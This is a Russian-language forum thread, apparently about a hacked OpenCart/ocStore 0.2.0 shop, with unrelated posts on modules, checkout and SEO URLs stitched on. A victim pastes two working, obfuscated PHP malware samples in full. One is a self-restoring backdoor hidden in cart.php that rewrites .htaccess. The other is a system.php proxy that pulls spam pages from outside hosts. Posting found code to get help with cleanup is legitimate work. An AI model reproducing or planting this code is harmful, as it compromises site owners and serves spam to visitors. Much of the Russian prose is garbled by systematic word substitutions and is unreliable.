Strongest

Да по поводу ссылки на взлом opencarta эи дырка зыкрыи или нет?

Дело в том, что даи изменения этих файлов стоит сирая, я бекап скачал с вирусом. Т.е. файл system/library/cart.php изменен 09.06.11 хотя этот же файл в бекапе от 27 лисла другой и даи на нем икая же 09.06.11 Да же влогах нашел вот что 85.26.241.84 - - [02/Feb/2012:12:14:40 +0400] "GET /books/images/jquery00.js HTTP/1.0" 404 5375 "http://alenset.in/eram/premierdetect.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

И еещё добавлю, нашел еещё в файле system/library/cart.php следующий код: function __destruct(){ $GLOBALS['_1047846918_']=Array(base64_decode('ZXJyb3' .'J' .'f' .'cmVw' .'b3J0aW' .'5n'),base64_decode('' .'dGl' .'tZQ' .'=='),base64_decode('Z' .'m' .'lsZV9leGlzdH' .'M='),base64_decode('Zm9wZW4='),base64_decode('Z' .'n' .'dyaXR' .'l'),base64_decode('Z3p' .'1bmNvbX' .'ByZXNz'),base64_decode('Ym' .'FzZ' .'TY0X2RlY29kZQ' .'=='),base64_decode('ZmNsb3Nl'),base64_decode('Z' .'m9' .'w' .'ZW4='),base64_decode('ZnJlYWQ='),base64_decode('Zml' .'s' .'ZXNpemU='),base64_decode('' .'ZmNsb3Nl'),base64_decode('c3Ryc' .'G9z'),base64_decode('c3R' .'ycG' .'9z'),base64_decode('Y2h' .'tb' .'2Q' .'='),base64_decode('Zm9' .'wZW' .'4='),base64_decode('ZndyaXRl'),base64_decode('Z3p1bmNvb' .'XByZXNz'),base64_decode('Y' .'mFz' .'ZTY0X2RlY29kZ' .'Q=='),base64_decode('ZmNs' .'b' .'3Nl'),base64_decode('Y2ht' .'b2' .'Q='),base64_decode('' .'Zm' .'lsZV' .'9' .'leGlzd' .'HM='),base64_decode('Zm9wZW4='),base64_decode('Z' .'ndyaXRl'),base64_decode('Z3p1b' .'mNvbXByZ' .'XNz'),base64_decode('Y' .'mF' .'zZT' .'Y0X2Rl' .'Y29k' .'ZQ=='),base64_decode('' .'Zm' .'Nsb3Nl'),base64_decode('Zm9w' .'ZW4' .'='),base64_decode('' .'Zn' .'JlY' .'WQ='),base64_decode('ZmlsZ' .'XNpe' .'mU' .'='),base64_decode('' .'ZmNsb3N' .'l'),base64_decode('YmFzZT' .'Y0' .'X2VuY29' .'k' .'ZQ=='),base64_decode('Z3' .'pjb' .'21wcmVzcw=='),base64_decode('Y' .'2htb2Q='),base64_decode('Zm9wZW4='),base64_decode('' .'Zn' .'d' .'ya' .'X' .'R' .'l'),base64_decode('Z3' .'p1bmNvbX' .'ByZ' .'XNz'),base64_decode('YmFzZTY0X2R' .'lY29kZQ=' .'='),base64_decode('Z' .'m' .'Nsb3Nl'),base64_decode('Y2h' .'tb2' .'Q=')); ?><? function _835434907($i){$a=Array('ZXJlbWlu','SXQgd29ya3Mh','ZXJlbWluMg==','ZUp5TlZFdHYwMEFRdmtmS2Z4aWFJaWdFcHdWeFFiU29RQ29pbFJhU1ZEMlVOdHJFWTJkVmU5ZnNiZ2dSUlNvdkNRa2tqcHdRQnc1Y1cyZ2xLQkQrd3ZvZk1Xc0hDS2xBWEx5Nzgvam1tNWRMWU4vYW9UMUlkK203YjcvWlEzc0lkT3hCMTVqa1VxVVNEMlNDb3NPVThWU3ZXQ2dXVmhQRHBkQndka2xHa2V3M0JuSEV4YloycWhMWTEzYlBmaWV3dy9TeC9aUStUbCtDL1VLWFIrNUpzQi9CSHRDVDlQYUlSRU82ZmJLZmY0T2Vxd2tmNytNNDJsRzZtNzdJa1E3SWdaRFNKL1k3MkNOSW41TDZNK0h2MmErUVBxZGpueDVEQ2pPMEg0cUZ5MHM4UW4yVG1VNFhwdTU0cDAwUzdYREJkeUlaN3BqN1ptWnFnZUlxSHhYNEtBWmw1cklwRnE3VEhRSWxZeUFCZ1ZSK295dzRWamtxS05tV1JudUVROUpGNTNyY2FXR1V4UnZLbG9xYlBuT0ZwbnkvMnFITDVVdjZDdXg3S3Y4N3IxaW9ZMTl4ZzFVUmNvR3dLbjVKcmpLTlVIRklJOEUxS1h3NCtlQkdzM21yZFdPMTBYd0lKN2FtQVRaV3JtMyswNmJmNzkveC9qU3I5eUtFcmRQZW1abnBuKzBtSzIvY3NUSTlCeHYxK1F1emMrWGxTY2UybE52YWVVTkZEN1RCZUhSNFNUZTV3djM1NmJsSlF2WHE3YlZxbzlsYXFpMVhWeFp2Vm9uWHVlQi9qUHkvR2EzVmE2U3ZaRlFtODlyWXVySko1TGdicVl4VFM4bWV3ZGE4eTJtNWZMdXh1RG5xRUZDSHh1WXlYNEQxOWZWL05lWjRqYmNTaFRGSEdpbURuWHhkeGdsbGxSb3I4NlQxUkttSldLa0VpNzdQM1dxd0NCcG9EQmVoQnRObEJtSTJBSUhvZzVIUVJrREIyaEc5QXFsQXl4aEJvN3FIU3Vjb2E2SWo0eGlGSVY4RWQyZkMxOUFlQUhHUTl3ZzFVNVJBODFCUXdkd3NrN0VNZ0Jzdmg2Z0ZNSkE5Q05FQUV6QlZFd1pWenNyRmdhcFNGUG5pN093VXNJQlVPU0VDTGp0a1FYRzBrUXBIWVpoTGdtdUlrZEhTRTY2Q3J0UUdmSWxhbkRLUTdXS1dwNWQzYU00YkVWRGdma1VnUlRUSXJUSjNWd1RtK3lSR1lveTBob1FCaHNkWXBqZFFwRVJxemFsQ1JDVGtOS1NxRlVheXpTTHRsRko0ME16NFVGSDdVbTA3UEo5clYxTHl2K1FZMFB5MGdvaUZ4d0ZrRU9Ra3owK1E3REtIR1BJTzNPMUpReitOVVpQSy94OHNjMi9sN3EwdzZjQnFFUHdBc3B3aUhRPT0=','RE9DVU1FTlRfUk9PVA==','Ly5odGFjY2Vzcw==','dw==','cg==','UmV3cml0ZVJ1bGUgXmJvb2tzKC4qKSAvc3lzdGVtL3N5c3RlbS5waHA/aWQ9JDE=','UmV3cml0ZUNvbmQgJXtSRVFVRVNUX1VSSX0gIS9ib29rcw==','dw==','ZUp6dFZtdHZva0FVL1N0K01CR3lwcGtaOEVHczI5VFcwamFzWFZGQk1ZYndzTVd1b3F1aTFXMy8rODRndHFqTTRINWZFd2R3enJubnpwMXpCeSt2TWxsWmVhcGRLNjEremhUTGdvREtwVUxCekEycTEvTzV0ZUZzYXpFc2lxWTdkS2J1a012MUJHMlR5MXprN0R0cFprL0dJTWZuVHhCa1h0dGd4TmJva250MTVkdzNxMGxJalV4SFNIVkZIcWhJZ2hvUDVUQTJHVjRUVU9UM0hUSkUyREtPUys1d1NEd214SFVFTmN3QVh6ZW5zNVljS25tR3JDWE1FazR5ajVBd0YvTStzNldndnZURE9pV3BoR3ZhelZLelpHVVk4bFZHRHRZdVM0K015WEgyNjRrUWxGaTlyOHJQYkRKUzNQSHBuN2c3S1BzVHhUd1hTZVpDbDJoc2R4Qm5rS2V0c1F1WDZJeG9SM2E3UktrN3V5SjdMc01sWkloY1JxOS9mQS9aKyttd25iSlRZeW1GMllZeEtBcDB0OFhXNDMzVmhLOWtycjVmWG1XZUE5OVpqcVoreG9SbFNTeVdSQWtpTGp2aS8yU3Q2S0RKV1RydTAzek91bGVCY3p0ZEtVaGI5dlR4d3VnK2Joei9JWEQ4emdwUEs1UEcxbGxYQ2JLSnBNQ1Z0Y0M5Z1oxaHR6WitHdFdBMGZXQWdqQmt1M2pwSWM5ei9NYll2WVdDcFJkKzJZSzdWZHIxVGFOZEozVEZyd1VHTmRMTTF1OThveVd0N1lrVG9pZXpkWVFPYjNVbmhmamJrVFUvUkxzejR5Vk54cmYwSG50TkhyRDFkZWxCYmt4NzNVZmNFVTNKUmVQQWtDWEIyWUMzSDYrZE4xSzg0eHJlTFF5OVFOQ0JwWXNyWEV2UHhtdHlKdHJTMHJVTjNpZGc2QTJnK0k5UTJTL3VmMzFwOWVVcjgrRXltUHVaUSt0bnJYNTJOT0FySDBkV0g1c200TEREVFZETm1tcTkyYW0zMnYyNC93RS9xR1JOV0tXOGdmdGd3UEVZZ0tweEV1UXpGemhraFVhQ0F3N0h6TjkwVk9YcFo5dkVsendPd1ZQeDZCQ3YxdHNkdGRGV3J4dXR1N3FhbjA4RDMrWEFOM0FoeEQ3c1I1NGtMVkJYSllTQzlJVEVhSDcwek5FZ0JRSUIrWGhaRU0valVsUHd4UUVYeDVJTVA0Ymp4WkFoVVRxVkVGa1M1VU9Kd2hrUzBxbEVrZWZmMzJuL3lQb1FuREpLcktRZ1BNeXFmRVpXRUoyS1NFd1I0VkFFZ3IwS25TSWVVV0JJY2J4cEJqdW44a0Z2R1loU2VnWVdFcHRHU091YTRqKzJEU3lkMlRjRjhrMXBDVmhPNlFrb3BUY0ZTbkFIWkhvV0hka0RudU5hbE9BUFdHVEtIQnVrZEk2TW1DQlRacllIU2pnV0lOTzY2T2hnUU9DY3pCS09CZ1NaTWtlSEEwS3BIWUtrSTRwdzBDSDRUZk1YMkpqR253PT0=','RE9DVU1FTlRfUk9PVA==','L3N5c3RlbS9zeXN0ZW0ucGhw','dw==','cg==','dw==');return base64_decode($a[$i]);} ?><?php $GLOBALS['_1047846918_'][0](round(0));if(isset($_GET[_835434907(0)]))die(_835434907(1));if($GLOBALS['_1047846918_'][1]()>=round(0+442570820.333+442570820.333+442570820.333)|| isset($_GET[_835434907(2)])){$_0=_835434907(3);$_1=$_SERVER[_835434907(4)] ._835434907(5);if(!$GLOBALS['_1047846918_'][2]($_1)){$_2=$GLOBALS['_1047846918_'][3]($_1,_835434907(6));$GLOBALS['_1047846918_'][4]($_2,$GLOBALS['_1047846918_'][5]($GLOBALS['_1047846918_'][6]($_0)));$GLOBALS['_1047846918_'][7]($_2);}else{$_2=$GLOBALS['_1047846918_'][8]($_1,_835434907(7));$_3=$GLOBALS['_1047846918_'][9]($_2,$GLOBALS['_1047846918_'][10]($_1));$GLOBALS['_1047846918_'][11]($_2);if(!$GLOBALS['_1047846918_'][12]($_3,_835434907(8))||!$GLOBALS['_1047846918_'][13]($_3,_835434907(9))){$GLOBALS['_1047846918_'][14]($_1,round(0+102.2+102.2+102.2+102.2+102.2));$_2=$GLOBALS['_1047846918_'][15]($_1,_835434907(10));$GLOBALS['_1047846918_'][16]($_2,$GLOBALS['_1047846918_'][17]($GLOBALS['_1047846918_'][18]($_0)));$GLOBALS['_1047846918_'][19]($_2);$GLOBALS['_1047846918_'][20]($_1,round(0+84+84+84+84+84));}}$_0=_835434907(11);$_1=$_SERVER[_835434907(12)] ._835434907(13);if(!$GLOBALS['_1047846918_'][21]($_1)){$_2=$GLOBALS['_1047846918_'][22]($_1,_835434907(14));$GLOBALS['_1047846918_'][23]($_2,$GLOBALS['_1047846918_'][24]($GLOBALS['_1047846918_'][25]($_0)));$GLOBALS['_1047846918_'][26]($_2);}else{$_2=$GLOBALS['_1047846918_'][27]($_1,_835434907(15));$_3=$GLOBALS['_1047846918_'][28]($_2,$GLOBALS['_1047846918_'][29]($_1));$GLOBALS['_1047846918_'][30]($_2);if($GLOBALS['_1047846918_'][31]($GLOBALS['_1047846918_'][32]($_3))!=$_0){$GLOBALS['_1047846918_'][33]($_1,round(0+127.75+127.75+127.75+127.75));$_2=$GLOBALS['_1047846918_'][34]($_1,_835434907(16));$GLOBALS['_1047846918_'][35]($_2,$GLOBALS['_1047846918_'][36]($GLOBALS['_1047846918_'][37]($_0)));$GLOBALS['_1047846918_'][38]($_2);$GLOBALS['_1047846918_'][39]($_1,round(0+98.6+98.6+98.6+98.6+98.6));}}} } Врогде пока не появляется, но все равно, что-то мне подсказывает что дырень осиется, т.е. ей можно воспользоваться еещё раз бугдет.

Добрый гдень, интернет магазин стоит на версии 0.2.0 Сегодня обнаружил следуюещёе, на сайте разместили в папке совершенно другой сайт и google проингдексировал, вот как это выглядит: сам сайт: http://www.******.ru/ и взломанные страницы вида *****.ru/books/rukovodstvo-po-remontu-folksvagen-passat/ Что нашел: файл htaccess изменен, в нем прописан редирект: RewriteEngine On RewriteBase / RewriteCond %{HTTP_HOST} !^$ [NC] RewriteCond %{HTTP_HOST} !^www. [NC] RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L] RewriteRule ^books(.*) /system/system.php?id=$1 RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} !/books RewriteRule ^([^?]*) index.php?_route_=$1 [L,QSA] Как видим он обращается к файлу /system/system.php В нем следующий код: <? $GLOBALS['_483328755_']=Array(base64_decode('Y3Vy' .'bF9pbml0'),base64_decode('Y3' .'VybF9zZX' .'RvcHQ='),base64_decode('Y3V' .'ybF9zZXRv' .'cHQ='),base64_decode('Y3VybF9leG' .'V' .'j'),base64_decode('Y' .'3VybF9' .'jbG9zZ' .'Q=' .'='),base64_decode('c3R' .'yc3Ry'),base64_decode('aGV' .'hZGVy'),base64_decode('c3Ryc3Ry'),base64_decode('' .'aGVhZG' .'V' .'y'),base64_decode('' .'c3R' .'yc3' .'Ry'),base64_decode('c' .'3' .'Ryc3Ry'),base64_decode('aGVhZGVy'),base64_decode('c3Ryc' .'3R' .'y'),base64_decode('' .'aG' .'Vh' .'ZGVy'),base64_decode('' .'aGVh' .'ZGV' .'y'),base64_decode('Y3VybF9' .'pb' .'ml0'),base64_decode('Y3Vy' .'bF9zZX' .'RvcHQ' .'='),base64_decode('Y3VybF9zZX' .'RvcHQ' .'='),base64_decode('Y3Vyb' .'F9leGVj'),base64_decode('Y' .'3VybF9jbG9' .'zZQ' .'=='),base64_decode('c3' .'Ry' .'c3Ry'),base64_decode('aGVh' .'ZGV' .'y'),base64_decode('' .'c3Ryc3Ry'),base64_decode('' .'a' .'GV' .'h' .'ZGVy'),base64_decode('c' .'3R' .'yc' .'3R' .'y'),base64_decode('c3' .'Ryc3Ry'),base64_decode('a' .'GVh' .'ZGVy'),base64_decode('c3Ryc3' .'R' .'y'),base64_decode('aGVhZGVy'),base64_decode('' .'a' .'GVhZGV' .'y')); ?><? function _1894674912($i){$a=Array('aWQ=','aHR0cDovL2VtYWlsZXJycnIucnUv','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD13aW5kb3dzLTEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUx','aWQ=','aHR0cDovL2FsZW5zZXQuaW4vZXJhbS9wcmVtaWVyZGV0ZWN0LnJ1Lw==','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD13aW5kb3dzLTEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUx');return base64_decode($a[$i]);} ?><? function l__0(){$_0=$_REQUEST[_1894674912(0)];$_1=$GLOBALS['_483328755_'][0]();$_2=_1894674912(1) .$_0;$GLOBALS['_483328755_'][1]($_1,CURLOPT_URL,$_2);$GLOBALS['_483328755_'][2]($_1,CURLOPT_RETURNTRANSFER,round(0+0.333333333333+0.333333333333+0.333333333333));$_3=$GLOBALS['_483328755_'][3]($_1);$GLOBALS['_483328755_'][4]($_1);if($GLOBALS['_483328755_'][5]($_0,_1894674912(2))){$GLOBALS['_483328755_'][6](_1894674912(3));}elseif($GLOBALS['_483328755_'][7]($_0,_1894674912(4))){$GLOBALS['_483328755_'][8](_1894674912(5));}elseif($GLOBALS['_483328755_'][9]($_0,_1894674912(6))|| $GLOBALS['_483328755_'][10]($_0,_1894674912(7))){$GLOBALS['_483328755_'][11](_1894674912(8));}elseif($GLOBALS['_483328755_'][12]($_0,_1894674912(9))){$GLOBALS['_483328755_'][13](_1894674912(10));}else{$GLOBALS['_483328755_'][14](_1894674912(11));}echo $_3;}$_0=$_REQUEST[_1894674912(12)];$_1=$GLOBALS['_483328755_'][15]();$_2=_1894674912(13) .$_0;$GLOBALS['_483328755_'][16]($_1,CURLOPT_URL,$_2);$GLOBALS['_483328755_'][17]($_1,CURLOPT_RETURNTRANSFER,round(0+0.5+0.5));$_3=$GLOBALS['_483328755_'][18]($_1);$GLOBALS['_483328755_'][19]($_1);if($GLOBALS['_483328755_'][20]($_0,_1894674912(14))){$GLOBALS['_483328755_'][21](_1894674912(15));}elseif($GLOBALS['_483328755_'][22]($_0,_1894674912(16))){$GLOBALS['_483328755_'][23](_1894674912(17));}elseif($GLOBALS['_483328755_'][24]($_0,_1894674912(18))|| $GLOBALS['_483328755_'][25]($_0,_1894674912(19))){$GLOBALS['_483328755_'][26](_1894674912(20));}elseif($GLOBALS['_483328755_'][27]($_0,_1894674912(21))){$GLOBALS['_483328755_'][28](_1894674912(22));}else{$GLOBALS['_483328755_'][29](_1894674912(23));}echo $_3; ?> Если изменять и удалять файлы они воссинавливаются. Если изменять права, то все равно воссинавливаются. Пароли от FTP менял, машина лисия, зналит ггде-то shell. Что нашел в интернете, вот ситья очень похожая: http://terror-web.uc...gazina/1-1-0-51 Вопрос. Как теперьь мне избавится от этот сейчасы. Ведь интернет магазин допиливался очень сильно, переход на новый движок повличет огромные перегделки.

Кто готов выложить русский модуль тут и чтобы подходил по OC 0.2.0 . Готов заплатить.

Собственно нужен модуль фотогнореи. Суещёствует ли икой? С возможностью создавать альпотому чтомы.

Готов заплатить за реализацию! Потом высивить в паблик бесплатно!

У меня, вопрос. Я убрал шаг выпотому чтора регистрации или гостевой заказ. Прописал чтобы по нажатию "оформить заказ" сразу шел на гостевой заказ $this->data['checkout'] = HTTPS_SERVER . 'index.php?route=checkout/guest_step_1';НО! Если зайти в корзину и нажать оформить заказ, то он все равно предлагает выпотому чтор регистрации или же гостевой заказ. А если нажимать справа на "оформить", ггде отображается добавленный товар, то все нормально, этот шаг пропускается. Ггде еещё нужно заменить параметр, кроме как cart.php?

Усиновил листую 0.2.0 потом посивил пак для него (SeoUrl_ocStore_0.2.0), но ошибка осиётся. При включении seo url не хочет заходить в подкатегорию и на сам товар этот подкатегории, пишет страница не найгдена. Всё облазил, усиновлено все правильно, все псевдонимы прописаны, но никак не хочет заходить в созданные подкатегории и товары в них. Если же класть товар в основную категорию, то страница товара отображается. PS Нашел в чем была ошибка! У меня совпадали псевдонимы производителей и псевдонимы подкатегорий, т.е. псевдоним производителя был firm1 и подкатегория имела псевдоним firm1, я думал это разные разгделы сайи и не как не повлияет на рилитоспособность, однако оказалось - нет. Поэтому не рилиило.